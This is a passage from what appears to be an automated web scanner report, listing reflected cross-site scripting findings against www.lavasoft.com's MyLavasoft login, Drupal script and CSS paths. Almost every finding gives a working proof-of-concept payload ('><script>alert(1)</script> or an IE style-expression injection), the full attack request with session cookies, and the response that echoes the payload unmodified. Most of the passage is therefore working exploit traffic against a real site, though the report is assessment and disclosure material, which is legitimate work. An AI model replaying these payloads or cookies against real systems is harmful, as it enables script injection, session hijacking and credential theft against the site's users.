Last-Modified: Wed, 07 Sep 2011 12:39:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18318
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/login5f879'><script>alert(1)</script>e4fcb70e95babf13'>
...[SNIP]...

1.169. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6354'><script>alert(1)</script>745e8b4b2d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/logine6354'><script>alert(1)</script>745e8b4b2d1?destination=/?domain=4b22e HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/?domain=4b22e%27%3E%3Cscript%3Eprompt(document.location)%3C/script%3E8a5fb0d26dc
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18308
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/logine6354'><script>alert(1)</script>745e8b4b2d1'>
...[SNIP]...

1.170. http://www.lavasoft.com/mylavasoft/login [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b4d'style%3d'x%3aexpression(alert(1))'ca66c4680d2948ae4 was submitted in the destination parameter. This input was echoed as b7b4d'style='x:expression(alert(1))'ca66c4680d2948ae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mylavasoft/login?destination=/?domain=4b22e&name=aTxijkQj38&mail=&pass%5Bpass1%5D=&pass%5Bpass2%5D=&timezone=-18000&form_build_id=form-151e601a49e595348b38fe5eb25431f6&form_id=user_register&captcha_sid=5059850&captcha_token=aab3446acbeb7c70605fb791b29b9f8b&captcha_response=reCAPTCHA&recaptcha_challenge_field=03AHJ_VuvCXJzKID-23Y5ovs8Cr3wiIdWWLcUQc9Wqsy4bo93K58LQoDpc6qnHPgMftcz6iV2bHKhsGh251lY_bj9fYHQzmXEBwNF6SkJKzpQlHnOpxRRrUHQtUTG0ErOJkWIc2k8kXOwKcmdOzkBUOx4Km3WmDL3Pjg&recaptcha_response_field=&op=Create+new+account&destination=%2Fabsolute%2F%2F%3Fdomain%3D4b22eb7b4d'style%3d'x%3aexpression(alert(1))'ca66c4680d2948ae4&ref=%2F%3Fdomain%3D4b22e%2527%253E%253Cscript%253Eprompt%28document.location%29%253C%2Fscript%253E8a5fb0d26dc HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.2.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1; has_js=1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:39:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:39:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 26441
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<input type='hidden' name='destination' value='/absolute//absolute//?domain=4b22eb7b4d'style='x:expression(alert(1))'ca66c4680d2948ae4' />
...[SNIP]...

1.171. http://www.lavasoft.com/mylavasoft/login [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a019'style%3d'x%3aexpression(alert(1))'38cb7c2a7e7 was submitted in the destination parameter. This input was echoed as 4a019'style='x:expression(alert(1))'38cb7c2a7e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /mylavasoft/login?destination=/?domain=4b22e4a019'style%3d'x%3aexpression(alert(1))'38cb7c2a7e7 HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/?domain=4b22e%27%3E%3Cscript%3Eprompt(document.location)%3C/script%3E8a5fb0d26dc
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:38:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 25022
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<input type='hidden' name='destination' value='/absolute//?domain=4b22e4a019'style='x:expression(alert(1))'38cb7c2a7e7' />
...[SNIP]...

1.172. http://www.lavasoft.com/mylavasoft/misc/drupal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 160d5'><script>alert(1)</script>ce9b102c404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft160d5'><script>alert(1)</script>ce9b102c404/misc/drupal.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10618
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft160d5'><script>alert(1)</script>ce9b102c404/misc/drupal.js?w'>
...[SNIP]...

1.173. http://www.lavasoft.com/mylavasoft/misc/drupal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a6729'><script>alert(1)</script>398b22b03e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misca6729'><script>alert(1)</script>398b22b03e7/drupal.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18208
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misca6729'><script>alert(1)</script>398b22b03e7/drupal.js'>
...[SNIP]...

1.174. http://www.lavasoft.com/mylavasoft/misc/drupal.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/drupal.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7375'><script>alert(1)</script>8ec033ef7c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misc/drupal.jsd7375'><script>alert(1)</script>8ec033ef7c0?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18170
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misc/drupal.jsd7375'><script>alert(1)</script>8ec033ef7c0'>
...[SNIP]...

1.175. http://www.lavasoft.com/mylavasoft/misc/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea828'><script>alert(1)</script>1d6fa491fe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftea828'><script>alert(1)</script>1d6fa491fe7/misc/jquery.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:21 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:21 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10618
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftea828'><script>alert(1)</script>1d6fa491fe7/misc/jquery.js?w'>
...[SNIP]...

1.176. http://www.lavasoft.com/mylavasoft/misc/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cbb9c'><script>alert(1)</script>9be3172317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misccbb9c'><script>alert(1)</script>9be3172317/jquery.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misccbb9c'><script>alert(1)</script>9be3172317/jquery.js'>
...[SNIP]...

1.177. http://www.lavasoft.com/mylavasoft/misc/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea8fd'><script>alert(1)</script>60b6de0a8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misc/jquery.jsea8fd'><script>alert(1)</script>60b6de0a8cc?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18170
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misc/jquery.jsea8fd'><script>alert(1)</script>60b6de0a8cc'>
...[SNIP]...

1.178. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc93e'><script>alert(1)</script>c92b17aa9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftcc93e'><script>alert(1)</script>c92b17aa9b/modules/forum/forum.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10626
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftcc93e'><script>alert(1)</script>c92b17aa9b/modules/forum/forum.css?w'>
...[SNIP]...

1.179. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a80a'><script>alert(1)</script>d08343746d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules7a80a'><script>alert(1)</script>d08343746d/forum/forum.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18242
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules7a80a'><script>alert(1)</script>d08343746d/forum/forum.css'>
...[SNIP]...

1.180. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9459e'><script>alert(1)</script>60483082767 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/forum9459e'><script>alert(1)</script>60483082767/forum.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
